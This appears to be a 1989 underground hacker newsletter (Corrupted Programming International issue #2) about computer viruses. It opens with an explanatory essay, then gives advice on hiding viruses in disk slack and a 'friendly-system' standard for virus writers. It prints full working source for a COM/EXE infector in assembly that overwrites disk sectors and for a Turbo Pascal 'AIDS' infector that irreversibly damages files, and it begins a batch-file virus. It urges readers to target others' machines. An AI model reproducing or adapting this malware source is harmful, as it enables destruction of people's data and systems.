[2.1] * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* *
* @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@@ *
* @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ *
* @@@@ @@@@ @@@@ @@@@ @@@ *
* @@@ @@@ @@@@ @@@ *
* @@@ @@@@@@@@@@@@@@@ @@@ *
* @@@ @@@@@@@@@@@@@@ @@@ *
* @@@ @@@ @@@ *
* @@@@ @@@@ @@@ @@@ *
* @@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ *
* @@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ *
* *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * *
C O R R U P T E D
P R O G R A M M I N G
I N T E R N A T I O N A L
presents:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ @
@ Virili And Trojan Horses @
@ @
@ A Protagonist's Point Of View @
@ @
@ Issue #2 @
@ @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
DISCLAIMER::All of the information contained in this newsletter reflects the
thoughts and ideas of the authors, not their actions. The sole
purpose of this document is to educate and spread information.
Any illegal or illicit action is not endorsed by the authors or
CPI. The authors and CPI are not responsible for any information
which may present itself as old or mis-interpreted, and actions
by the reader. Remember, 'Just Say No!'
CPI #2 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Issue 2, Volume 1 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Release Date::July 27,1989 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Introduction To CPI#2
---------------------
Well, here is the "long awaited" second issue of CPI, A Protagonist's Point
of view. This issue should prove a bit interesting, I dunno, but at least
entertaining for the time it takes to read. Enjoy the information and don't
forget the disclaimer.
Oh yes, if you have some interesting articles or an application to send
us, just see the BBS list at the end of this document. Thanx. All applications
and information will be voted on through the CPI Inner Circle. Hope you enjoy
this issue as much as we enjoyed typing it... hehe...
Until our next issue, (which may be whenever), good-bye.
Doctor Dissector
Table of Contents
-----------------
Part Title Author
-----------------------------------------------------------------------------
2.1 Title Page, Introduction, & TOC....................... Doctor Dissector
2.2 Another Explanation Of Virili And Trojans............. Acid Phreak
2.3 V-IDEA-1.............................................. Ashton Darkside
2.4 V-IDEA-2.............................................. Ashton Darkside
2.5 The Generic Virus..................................... Doctor Dissector
2.6 Aids.................................................. Doctor Dissector
2.7 Batch File Virus...................................... PHUN 3.2
2.8 Basic Virus........................................... PHUN 3.2
2.9 The Alemeda Virus..................................... PHUN 4.3
2.10 Virili In The News.................................... Various Sources
2.11 Application For CPI................................... CPI Inner Circle
(CPI Node Phone #'s Are In 2.11)
[2.2]
Explanation of Viruses and Trojans Horses
-----------------------------------------
Written by Acid Phreak
Like it's biological counterpart, a computer virus is an agent of
infection, insinuating itself into a program or disk and forcing its host
to replicate the virus code. Hackers fascinated by the concept of "living"
code wrote the first viruses as projects or as pranks. In the past few
years, however, a different kind of virus has become common, one that lives
up to an earlier meaning of the word: in Latin, virus means poison.
These new viruses incorporate features of another type of insidious
program called a Trojan horse. Such a program masquerades as a useful
utility or product but wreaks havoc on your system when you run it. It may
erase a few files, format your disk, steal secrets--anything software can
do, a Trojan horse can do. A malicious virus can do all this then attempt
to replicate itself and infect other systems.
The growing media coverage of the virus conceptand of specific viruse
has promoted the development of a new type of software. Antivirus programs,
vaccines--they go by many names, but their purpose is to protect from virus
attack. At present there are more antivirus programs than known viruses
(not for long).
Some experts quibble about exactly what a virus is. The most widely
known viruses, the IBM Xmas virus and the recent Internet virus, are not
viruses according to some experts because they do not infect other programs.
Others argue that every Trojan horse is a virus--one that depends completely
on people to spread it.
How They Reproduce:
-------------------
Viruses can't travel without people. Your PC will not become infected
unless someone runs an infected program on it, whether accidentally or on
purpose. PC's are different from mainframe networks in this way--the
mainframe Internet virus spread by transmitting itself to other systems and
ordering them to execute it as a program. That kind of active transmission
is not possible on a PC.
Virus code reproduces by changing something in your system. Some viruses
strike COMMAND.COM or the hidden system files. Others, like the notorious
Pakistani-Brain virus, modify the boot sector of floppy disks. Still others
attach themselves to any .COM or .EXE file. In truth, any file on your
system that can be executed--whether it's a program, a device driver, an
overlay, or even a batch file--could be the target of a virus.
When an infected program runs, the virus code usually executes first and
then transfers control to the original program. The virus may immediately
infect other programs, or it may load itself into RAM and continue spreading.
If the virus can infect a file that will be used on another system, it has
succeeded.
What They Can Do:
-----------------
Viruses go through two phases: a replication phase and an action phase.
The action doesn't happen until a certain even occurs--perhaps reaching a
special date or running the virus a certain number of times. It wouldn't
make sense for a virus to damage your system the first time it ran; it needs
some time to grow and spread first.
The most vulnerable spot for a virus attack is your hard disk's file
allocation table (FAT). This table tells DOS where every file's data resides
on the disk. Without the FAT, the data's still there but DOS can't find it.
A virus could also preform a low-level format on some or all the tracks of
your hard disk, erase all files, or change the CMOS memory on AT-class
computers so that they don't recognize the hard disk.
Most of the dangers involve data only, but it's even possible to burn
out a monochrome monitor with the right code.
Some virus assaults are quite subtl. One known virus finds four
consecutive digits on the screen and switches two. Let's hope you're not
balancing the company's books when this one hits. Others slow down system
operations or introduce serious errors.
[2.3]
-------------------------------------------------------------------------------
______ ________ ___________
/ ____ \ | ____ \ |____ ____|
| / \_| | | \ | | |
| | | |_____| | | |
| | | ______/ | |
| | _ | | | |
| \____/ | /\ | | /\ ____| |____ /\
\______/ \/ |_| \/ |___________| \/
"We ain't the phucking Salvation Army."
-------------------------------------------------------------------------------
C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L
* * * present * * *
"Ok, I've written the virus, now where the hell do I put it?"
By Ashton Darkside (DUNE / SATAN / CPI)
*******************************************************************************
DISCLAIMER: This text file is provided to the massed for INFORMATIONAL PURPOSES
ONLY! The author does NOT condone the use of this information in any manner
that would be illegal or harmful. The fact that the author knows and spreads
this information in no way suggests that he uses it. The author also accepts
no responsibility for the malicious use of this information by anyone who
reads it! Remember, we may talk alot, but we "just say no" to doing it.
*******************************************************************************
Ok, wow! You've just invented the most incredibly nifty virus. It
slices, it dices, it squshes, it mushes (sorry Berke Breathed) people's data!
But the only problem is, if you go around infecting every damn file, some cute
software company is going to start putting in procedures that checksum their
warez each time they run, which will make life for your infecting virus a total
bitch. Or somebody's going to come up with an incredibly nifty vaccination util
that will wipe it out. Because, i mean, hey, when disk space starts vanishing
suddenly in 500K chunks people tend to notice. Especially people like me that
rarely have more than 4096 bytes free on their HD anyway. Ok. So you're saying
"wow, so what, I can make mine fool-proof", etc, etc. But wait! There's no need
to go around wasting your precious time when the answer is right there in front
of you! Think about it, you could be putting that time into writing better and
more inovative viruses, or you could be worring about keeping the file size,
the date & time, and the attributes the same. With this system, you only need
to infect one file, preferably one that's NOT a system file, but something that
will get run alot, and will be able to load your nifty virus on a daily basis.
This system also doesn't take up any disk space, other than the loader. And the
loader could conceivably be under 16 bytes (damn near undetectable). First of
all, you need to know what programs to infect. Now, everybody knows about using
COMMAND.COM and that's unoriginal anyway, when there are other programs people
run all the time. Like DesqView or Norton Utilities or MASM or a BBS file or
WordPerfect; you get the idea. Better still are dos commands like Format, Link
or even compression utilities. But you get the point. Besides, who's going to
miss 16 bytes, right? Now, the good part: where to put the damn thing. One note
to the programmer: This could get tricky if your virus is over 2k or isn't
written in Assembly, but the size problem is easy enough, it would be a simple
thing to break your virus into parts and have the parts load each other into
the system so that you do eventually get the whole thing. The only problem with
using languages besides assembly is that it's hard to break them up into 2k
segments. If you want to infect floppys, or smaller disks, you'd be best off to
break your file into 512 byte segments, since they're easier to hide. But, hey,
in assembly, you can generate pretty small programs that do alot, tho. Ok, by
now you've probably figured out that we're talking about the part of the disk
called 'the slack'. Every disk that your computer uses is divided up into parts
called sectors, which are (in almost all cases) 512 bytes. But in larger disks,
and even in floppies, keeping track of every single sector would be a complete
bitch. So the sectors are bunched together into groups called 'clusters'. On
floppy disks, clusters are usually two sectors, or 1024 bytes, and on hard
disks, they're typically 4096 bytes, or eight sectors. Now think about it, you
have programs on your hard disk, and what are the odds that they will have
sizes that always end up in increments of 4096? If I've lost you, think of it
this way: the file takes up a bunch of clusters, but in the last cluster it
uses, there is usually some 'slack', or space that isn't used by the file. This
space is between where the actual file ends and where the actual cluster ends.
So, potentially, you can have up to 4095 bytes of 'slack' on a file on a hard
disk, or 1023 bytes of 'slack' on a floppy. In fact, right now, run the Norton
program 'FS /S /T' command from your root directory, and subtract the total
size of the files from the total disk space used. That's how much 'slack' space
is on your disk (a hell of alot, even on a floppy). To use the slack, all you
need to do is to find a chunk of slack big enough to fit your virus (or a
segment of your virus) and use direct disk access (INT 13) to put your virus
there. There is one minor problem with this. Any disk write to that cluster
will overwrite the slack with 'garbage' from memory. This is because of the way
DOS manages it's disk I/O and it can't be fixed without alot of hassles. But,
there is a way around even this. And it involves a popular (abeit outdated and
usually ineffectual) form of virus protection called the READ-ONLY flag. This
flag is the greatest friend of this type of virus. Because if the file is not
written to, the last cluster is not written to, and voila! Your virus is safe
from mischivious accidents. And since the R-O flag doesn't affect INT 13 disk
I/O, it won't be in your way. Also, check for programs with the SYSTEM flag set
because that has the same Read-only effect (even tho I haven't seen it written,
it's true that if the file is designated system, DOS treats it as read-only,
whether the R-O flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM
in MS-DOS (not PC-DOS, it uses different files, or so I am told; I've been too
lazy to find out myself) or a protected (!) COMMAND.COM file in either type of
DOS would be ideal for this. All you have to do is then insert your loader into
some innocent-looking file, and you are in business. All your loader has to do
is read the sector into the highest part of memory, and do a far call to it.
Your virus cann then go about waiting for floppy disks to infect, and place
loaders on any available executable file on the disk. Sound pretty neet? It is!
Anyway, have fun, and be sure to upload your virus, along with a README file on
how it works to CPI Headquarters so we can check it out! And remember: don't
target P/H/P boards (that's Phreak/Hack/Pirate boards) with ANY virus. Even if
the Sysop is a leech and you want to shove his balls down his throat. Because
if all the PHP boards go down (especially members of CPI), who the hell can you
go to for all these nifty virus ideas? And besides, it's betraying your own
people, which is uncool even if you are an anarchist. So, target uncool PD
boards, or your boss's computer or whatever, but don't attack your friends.
Other than that, have phun, and phuck it up!
Ashton Darkside
Dallas Underground Network Exchange (DUNE)
Software And Telecom Applicaitons Network (SATAN)
Corrupted Programmers International (CPI)
PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk).
Call these boards because the sysops are cool:
Oblivion (SATAN HQ) Sysop: Agent Orange (SATAN leader)
System: Utopia (SATAN HQ) Sysop: Robbin' Hood (SATAN leader)
The Andromeda Strain (CPI HQ) Sysop: Acid Phreak (CPI leader)
D.U.N.E. (DUNE HQ) Sysop: Freddy Krueger (DUNE leader)
The Jolly Bardsmen's Pub & Tavern
The Sierra Crib
The Phrozen Phorest
Knight Shadow's Grotto
And if I forgot your board, sorry, but don't send me E-mail bitching about it!
[2.4]
-------------------------------------------------------------------------------
______ ________ ___________
/ ____ \ | ____ \ |____ ____|
| / \_| | | \ | | |
| | | |_____| | | |
| | | ______/ | |
| | _ | | | |
| \____/ | /\ | | /\ ____| |____ /\
\______/ \/ |_| \/ |___________| \/
"We ain't the phucking Salvation Army."
-------------------------------------------------------------------------------
C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L
* * * present * * *
CPI Virus Standards - Protect yourself and your friends
By Ashton Darkside (DUNE / SATAN / CPI)
*******************************************************************************
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES
ONLY! The author does NOT condone the use of this information in any manner
that would be illegal or harmful. The fact that the author knows and spreads
this information in no way suggests that he uses it. The author also accepts
no responsibility for the malicious use of this information by anyone who
reads it! Remember, we may talk alot, but we "just say no" to doing it.
*******************************************************************************
One of the main problems with viruses is that once you set one loose,
it is no longer under your control. I propose to stop this by introducing some
standards of virus writing that will enable them to be deactivated whenever
they enter a 'friendly' (CPI) system. In the long run, even the author of the
virus is not immune to being attacked. The following are what I have termed the
CPI standards for writing viruses. They will allow a virus to easily check any
system they are being run on for a type of 'identity badge'. If it is found,
the virus will not infect the system it is being run on. The other standards
are mostly written around this.
CPI Standards for writing viruses -
1 - The virus will have an 'active period' and an 'inactive period'.
The active periods will be no more than one year in length (to make
it more difficult to discover the virus). You may release different
versions of your virus with different 'active periods'. It is not
recommended that your virus deactivate itself after the set active
period, as this would enable people to deactivate viruses by using
their computer with the date set to 2069 or something. It is also
required that activation periods begin on January 1 and end on
December 31. This will coincide with the changing identity codes.
2 - The virus will check for an identity code by executing Interrrupt
12h with the following register settings: AX - 4350, BX - 4920,
CX - AB46, DX - 554E. If the system is friendly, then a pointer
will be returned in CX:DX to an ASCIIZ (0-terminated) string which
will have different contents in different years. The codes are not
to be included in any text file, and should only be given through
E-mail on CPI affiliated systems. You can always ask me by sending
me mail at The Andromeda Strain BBS. If a system is detected as
friendly, the virus will not attempt to infect or damage it, but it
is ok to display a little greeting message about how lucky the
user was.
3 - We very much encourage you to upload your virus, along with a breif
description on the workings into the CPI section at The Andromeda
Strain BBS. Only CPI members will know about your virus. This is
so that CPI members can share techniques and it also allows us to
verify that the identity check works. If we see any improvements
that could be made, such as ways to streamline code, better ways of
spreading, etc. we will inform you so that you can make the changes
if you wish.
4 - It is also suggested that you use ADS standard for virus storage on
infected disks. This meathod uses disk slack space for storage and
is more thoroughly described in a previous text file by me. I think
that this is the most effective and invisible way to store viruli.
5 - A list of CPI-Standard viruli will be avaliable at all times from
The Andromeda Strain BBS, to CPI users. Identity strings will also
be available to anyone in CPI, or anyone who uploads source code to
a virus which is 100% complete except for the Identity string (it
must be written to CPI-Standards). Non-CPI members who do this will
be more seriously considered for membership in CPI.
Ashton Darkside
Dallas Underground Network Exchange (DUNE)
Software And Telecom Applications Network (SATAN)
Corrupted Programmers International (CPI)
PS: This file (by itself) has approx 2.5k of slack.
;[2.5]
;=============================================================================
;
; C*P*I
;
; CORRUPTED PROGRAMMING INTERNATIONAL
; -----------------------------------
; p r e s e n t s
;
; T H E
; _ _
; (g) GENERIC VIRUS (g)
; ^ ^
;
;
; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF
; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT
; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR "PROGRAM TO BIG TO
; FIT IN MEMORY" THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS.
;
; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON
; THE DISK. HAVE PHUN WITH THIS ONE.
;
; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE
; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING.
;
; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE
; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF
; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR
; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE.
;
; DOCTOR DISSECTOR
; CPI INNER CIRCLE
;
;=============================================================================
MAIN:
NOP ;| Marker bytes that identify this program
NOP ;| as infected/a virus
NOP ;|
MOV AX,00 ;| Initialize the pointers
MOV ES:[POINTER],AX ;|
MOV ES:[COUNTER],AX ;|
MOV ES:[DISKS B],AL ;|
MOV AH,19 ;| Get the selected drive (dir?)
INT 21 ;|
MOV CS:DRIVE,AL ;| Get current path (save drive)
MOV AH,47 ;| (dir?)
MOV DH,0 ;|
ADD AL,1 ;|
MOV DL,AL ;| (in actual drive)
LEA SI,CS:OLD_PATH ;|
INT 21 ;|
MOV AH,0E ;| Find # of drives
MOV DL,0 ;|
INT 21 ;|
CMP AL,01 ;| (Check if only one drive)
JNZ HUPS3 ;| (If not one drive, go the HUPS3)
MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive)
HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive
LEA BX,SEARCH_ORDER ;|
ADD BX,AX ;|
ADD BX,0001 ;|
MOV CS:POINTER,BX ;|
CLC ;|
CHANGE_DISK: ;| Carry is set if no more .COM files are
JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be
MOV AH,17 ;| renamed to .COM (change .EXE to .COM)
LEA DX,CS:MASKE_EXE ;| but will cause the error message "Program
INT 21 ;| to large to fit in memory" when starting
CMP AL,0FF ;| larger infected programs
JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found)
MOV AH,2CH ;| If neither .COM or .EXE files can be found,
INT 21 ;| then random sectors on the disk will be
MOV BX,CS:POINTER ;| overwritten depending on the system time
MOV AL,CS:[BX] ;| in milliseconds. This is the time of the
MOV BX,DX ;| complete "infection" of a storage medium.
MOV CX,2 ;| The virus can find nothing more to infect
MOV DH,0 ;| starts its destruction.
INT 26 ;| (write crap on disk)
NO_NAME_CHANGE: ;| Check if the end of the search order table
MOV BX,CS:POINTER ;| has been reached. If so, end.
DEC BX ;|
MOV CS:POINTER,BX ;|
MOV DL,CS:[BX] ;|
CMP DL,0FF ;|
JNZ HUPS2 ;|
JMP HOPS ;|
HUPS2: ;| Get a new drive from the search order table
MOV AH,0E ;| and select it, beginning with the ROOT dir.
INT 21 ;| (change drive)
MOV AH,3B ;| (change path)
LEA DX,PATH ;|
INT 21 ;|
JMP FIND_FIRST_FILE ;|
FIND_FIRST_SUBDIR: ;| Starting from the root, search for the
MOV AH,17 ;| first subdir. First, (change .exe to .com)
LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the
INT 21 ;| old directory.
MOV AH,3B ;| (use root directory)
LEA DX,PATH ;|
INT 21 ;|
MOV AH,04E ;| (search for first subdirectory)
MOV CX,00010001B ;| (dir mask)
LEA DX,MASKE_DIR ;|
INT 21 ;|
JC CHANGE_DISK ;|
MOV BX,CS:COUNTER ;|
INC BX ;|
DEC BX ;|
JZ USE_NEXT_SUBDIR ;|
FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more
MOV AH,4FH ;| are found, the (search for next subdir)
INT 21 ;| drive will be changed.
JC CHANGE_DISK ;|
DEC BX ;|
JNZ FIND_NEXT_SUBDIR ;|
USE_NEXT_SUBDIR:
MOV AH,2FH ;| Select found directory. (get dta address)
INT 21 ;|
ADD BX,1CH ;|
MOV ES:[BX],W"\" ;| (address of name in dta)
INC BX ;|
PUSH DS ;|
MOV AX,ES ;|
MOV DS,AX ;|
MOV DX,BX ;|
MOV AH,3B ;| (change path)
INT 21 ;|
POP DS ;|
MOV BX,CS:COUNTER ;|
INC BX ;|
MOV CS:COUNTER,BX ;|
FIND_FIRST_FILE: ;| Find first .COM file in the current dir.
MOV AH,04E ;| If there are none, (Search for first)
MOV CX,00000001B ;| search the next directory. (mask)
LEA DX,MASKE_COM ;|
INT 21 ;|
JC FIND_FIRST_SUBDIR ;|
JMP CHECK_IF_ILL ;|
FIND_NEXT_FILE: ;| If program is ill (infected) then search
MOV AH,4FH ;| for another. (search for next)
INT 21 ;|
JC FIND_FIRST_SUBDIR ;|
CHECK_IF_ILL: ;| Check if already infected by virus.
MOV AH,3D ;| (open channel)
MOV AL,02 ;| (read/write)
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV BX,AX ;| (save channel)
MOV AH,3FH ;| (read file)
MOV CH,BUFLEN ;|
MOV DX,BUFFER ;| (write in buffer)
INT 21 ;|
MOV AH,3EH ;| (close file)
INT 21 ;|
MOV BX,CS:[BUFFER] ;| (look for three NOP's)
CMP BX,9090 ;|
JZ FIND_NEXT_FILE ;|
MOV AH,43 ;| This section by-passes (write enable)
MOV AL,0 ;| the MS/PC DOS Write Protection.
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV AH,43 ;|
MOV AL,01 ;|
AND CX,11111110B ;|
INT 21 ;|
MOV AH,3D ;| Open file for read/write (open channel)
MOV AL,02 ;| access (read/write)
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV BX,AX ;| Read date entry of program and (channel)
MOV AH,57 ;| save for future use. (get date)
MOV AL,0 ;|
INT 21 ;|
PUSH CX ;| (save date)
PUSH DX ;|
MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp)
MOV CS:[JMPBUF],DX ;| the program will be saved for future use.
MOV DX,CS:[BUFFER+1] ;| (save new jump)
LEA CX,CONT-100 ;|
SUB DX,CX ;|
MOV CS:[CONTA],DX ;|
MOV AH,57 ;| The virus now copies itself to (write date)
MOV AL,1 ;| to the start of the file.
POP DX ;|
POP CX ;| (restore date)
INT 21 ;|
MOV AH,3EH ;| (close file)
INT 21 ;|
MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus
MOV CS:[CONTA],DX ;| at address "CONTA" the jump which was at the
;| start of the program. This is done to
HOPS: ;| preserve the executability of the host
NOP ;| program as much as possible. After saving,
CALL USE_OLD ;| it still works with the jump address in the
;| virus. The jump address in the virus differs
;| from the jump address in memory
CONT DB 0E9 ;| Continue with the host program (make jump)
CONTA DW 0 ;|
MOV AH,00 ;|
INT 21 ;|
USE_OLD:
MOV AH,0E ;| Reactivate the selected (use old drive)
MOV DL,CS:DRIVE ;| drive at the start of the program, and
INT 21 ;| reactivate the selected path at the start
MOV AH,3B ;| of the program.(use old drive)
LEA DX,OLD_PATH-1 ;| (get old path and backslash)
INT 21 ;|
RET ;|
SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF
POINTER DW 0000 ;| (pointer f. search order)
COUNTER DW 0000 ;| (counter f. nth. search)
DISKS DB 0 ;| (number of disks)
MASKE_COM DB "*.COM",00 ;| (search for com files)
MASKE_DIR DB "*",00 ;| (search for dir's)
MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB
DB 0,"????????EXE",0,0,0,0
DB 0,"????????COM",0
MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB
DB 0,"???????????",0,0,0,0
DB 0,"????????COM",0
BUFFER EQU 0E00 ;| (a safe place)
BUFLEN EQU 208H ;| Length of virus. Modify this accordingly
;| if you modify this source. Be careful
;| for this may change!
JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp)
PATH DB "\",0 ;| (first place)
DRIVE DB 0 ;| (actual drive)
BACK_SLASH DB "\"
OLD_PATH DB 32 DUP (?) ;| (old path)
[2.6]
+-------------------------------+ +--------------------------------------+
| | P | |
| @@@@@@@ @@@@@@@@ @@@@@@@@ | * | ##### ##### #### ##### |
| @@ @@ @@ @@ | R | # # # # # # |
| @@ @@ @@ @@ | * | ##### # # # ##### |
| @@ @@@@@@@@ @@ | E | # # # # # # |
| @@ @@ @@ | * | # # ##### #### ##### |
| @@ @@ @@ | S | |
| @@@@@@@ @@ @@@@@@@@ | * +--------------------------------------+
| | E | A NEW AND IMPROVED VIRUS FOR |
+-------------------------------+ * | PC/MS DOS MACHINES |
| C O R R U P T E D | N +--------------------------------------+
| | * | CREATED BY: DOCTOR DISSECTOR |
| P R O G R A M M I N G | T |FILE INTENDED FOR EDUCATIONAL USE ONLY|
| | * | AUTHOR NOT RESPONSIBLE FOR READERS |
| I N T E R N A T I O N A L | S |DOES NOT ENDORSE ANY ILLEGAL ACTIVITYS|
+-------------------------------+ +--------------------------------------+
Well well, here it is... I call it AIDS... It infects all COM files, but it is
not perfect, so it will also change the date/time stamp to the current system.
Plus, any READ-ONLY attributes will ward this virus off, it doesn't like them!
Anyway, this virus was originally named NUMBER ONE, and I modified the code so
that it would fit my needs. The source code, which is included with this neato
package was written in Turbo Pascal 3.01a. Yeah I know it's old, but it works.
Well, I added a few things, you can experiment or mess around with it if you'd
like to, and add any mods to it that you want, but change the name and give us
some credit if you do.
The file is approximately 13k long, and this extra memory will be added to the
file it picks as host. If no more COM files are to be found, it picks a random
value from 1-10, and if it happens to be the lucky number 7, AIDS will present
a nice screen with lots of smiles, with a note telling the operator that their
system is now screwed, I mean permanantly. The files encrypted containing AIDS
in their code are IRREVERSIBLY messed up. Oh well...
Again, neither CPI nor the author of Number One or AIDS endorses this document
and program for use in any illegal manner. Also, CPI, the author to Number One
and AIDS is not responsible for any actions by the readers that may prove harm
in any way or another. This package was written for EDUCATIONAL purposes only!
{ Beginning of source code, Turbo Pascal 3.01a }
{C-}
{U-}
{I-} { Wont allow a user break, enable IO check }
{ -- Constants --------------------------------------- }
Const
VirusSize = 13847; { AIDS's code size }
Warning :String[42] { Warning message }
= 'This File Has Been Infected By AIDS! HaHa!';
{ -- Type declarations------------------------------------- }
Type
DTARec =Record { Data area for file search }
DOSnext :Array[1..21] of Byte;
Attr : Byte;
Ftime,
FDate,
FLsize,
FHsize : Integer;
FullName: Array[1..13] of Char;
End;
Registers = Record {Register set used for file search }
Case Byte of
1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte);
End;
{ -- Variables--------------------------------------------- }
Var
{ Memory offset program code }
ProgramStart : Byte absolute Cseg:$100;
{ Infected marker }
MarkInfected : String[42] absolute Cseg:$180;
Reg : Registers; { Register set }
DTA : DTARec; { Data area }
Buffer : Array[Byte] of Byte; { Data buffer }
TestID : String[42]; { To recognize infected files }
UsePath : String[66]; { Path to search files }
{ Lenght of search path }
UsePathLenght: Byte absolute UsePath;
Go : File; { File to infect }
B : Byte; { Used }
LoopVar : Integer; {Will loop forever}
{ -- Program code------------------------------------------ }
Begin
GetDir(0, UsePath); { get current directory }
if Pos('\', UsePath) <> UsePathLenght then
UsePath := UsePath + '\';
UsePath := UsePath + '*.COM'; { Define search mask }
Reg.AH := $1A; { Set data area }
Reg.DS := Seg(DTA);
Reg.DX := Ofs(DTA);
MsDos(Reg);
UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 }
Reg.AH := $4E;
Reg.DS := Seg(UsePath);
Reg.DX := Ofs(UsePath[1]);
Reg.CX := $ff; { Set attribute to find ALL files }
MsDos(Reg); { Find first matching entry }
IF not Odd(Reg.Flags) Then { If a file found then }
Repeat
UsePath := DTA.FullName;
B := Pos(#0, UsePath);
If B > 0 then
Delete(UsePath, B, 255); { Remove garbage }
Assign(Go, UsePath);
Reset(Go);
If IOresult = 0 Then { If not IO error then }
Begin
BlockRead(Go, Buffer, 2);
Move(Buffer[$80], TestID, 43);
{ Test if file already ill(Infected) }
If TestID <> Warning Then { If not then ... }
Begin
Seek (Go, 0);
{ Mark file as infected and .. }
MarkInfected := Warning;
{ Infect it }
BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7));
Close(Go);
Halt; {.. and halt the program }
End;
Close(Go);
End;
{ The file has already been infected, search next. }
Reg.AH := $4F;
Reg.DS := Seg(DTA);
Reg.DX := Ofs(DTA);
MsDos(Reg);
{ ......................Until no more files are found }
Until Odd(Reg.Flags);
Loopvar:=Random(10);
If Loopvar=7 then
begin
Writeln(''); {Give a lot of smiles}
Writeln('');
Writeln(' ');
Writeln(' ATTENTION: ');
Writeln(' I have been elected to inform you that throughout your process of ');
Writeln(' collecting and executing files, you have accidentally HKф ');
Writeln(' yourself over; again, that''s PHUCKED yourself over. No, it cannot ');
Writeln(' be; YES, it CAN be, a ћчs has infected your system. Now what do ');
Writeln(' you have to say about that? HAHAHAHA. Have HЅ with this one and ');
Writeln(' remember, there is NO cure for ');
Writeln(' ');
Writeln(' лллллллллл лллллллллллл ллллллллллл лллллллллл ');
Writeln(' лллББББББллл ББББллББББББ ллБББББББллл лллБББББББлл ');
Writeln(' ллББ ллБ ллБ ллБ ллБ ллББ ББ ');
Writeln(' ллБ ллБ ллБ ллБ ллБ ллБ ');
Writeln(' ллллллллллллБ ллБ ллБ ллБ лллллллллллл ');
Writeln(' ллББББББББллБ ллБ ллБ ллБ БББББББББллБ ');
Writeln(' ллБ ллБ ллБ ллБ ллБ ллБ ');
Writeln(' ллБ ллБ ллБ ллБ лллБ лл лллБ ');
Writeln(' ллБ ллБ лллллллллллл лллллллллллББ ллллллллллББ ');
Writeln(' ББ ББ ББББББББББББ БББББББББББ ББББББББББ ');
Writeln(' ');
Writeln(' ');
REPEAT
LOOPVAR:=0;
UNTIL LOOPVAR=1;
end;
End.
{ Although this is a primitive virus its effective. }
{ In this virus only the .COM }
{ files are infected. Its about 13K and it will }
{ change the date entry. }
[2.7]
Batch Viruses
-------------
Whoever thought that viruses could be in BATCH file.This virus which we
are about to see makes use of MS-DOS operating system. This BATCH virus
uses DEBUG & EDLIN programs.
Name: VR.BAT
echo = off ( Self explanatory)
ctty nul ( This is important. Console output is turned off)
path c:\msdos ( May differ on other systems )
dir *.com/w>ind ( The directory is written on "ind" ONLY name entries)
edlin ind<1 ( "Ind" is processed with EDLIN so only file names appear)
debug ind<2 ( New batch program is created with debug)
edlin name.bat<3 ( This batch goes to an executable form because of EDLIN)
ctty con ( Console interface is again assigned)
name ( Newly created NAME.BAT is called.
In addition to file to this Batch file,there command files,here named 1,2,3
Here is the first command file:
-------------------------------
Name: 1
1,4d ( Here line 1-4 of the "IND" file are deleted )
e ( Save file )
Here is the second command file:
--------------------------------
Name: 2
m100,10b,f000 (First program name is moved to the F000H address to save)
e108 ".BAT" (Extention of file name is changed to .BAT)
m100,10b,f010 (File is saved again)
e100"DEL " (DEL command is written to address 100H)
mf000,f00b,104 (Original file is written after this command)
e10c 2e (Period is placed in from of extension)
e110 0d,0a (Carrige return+ line feed)
mf010,f020,11f ( Modified file is moved to 11FH address from buffer area)
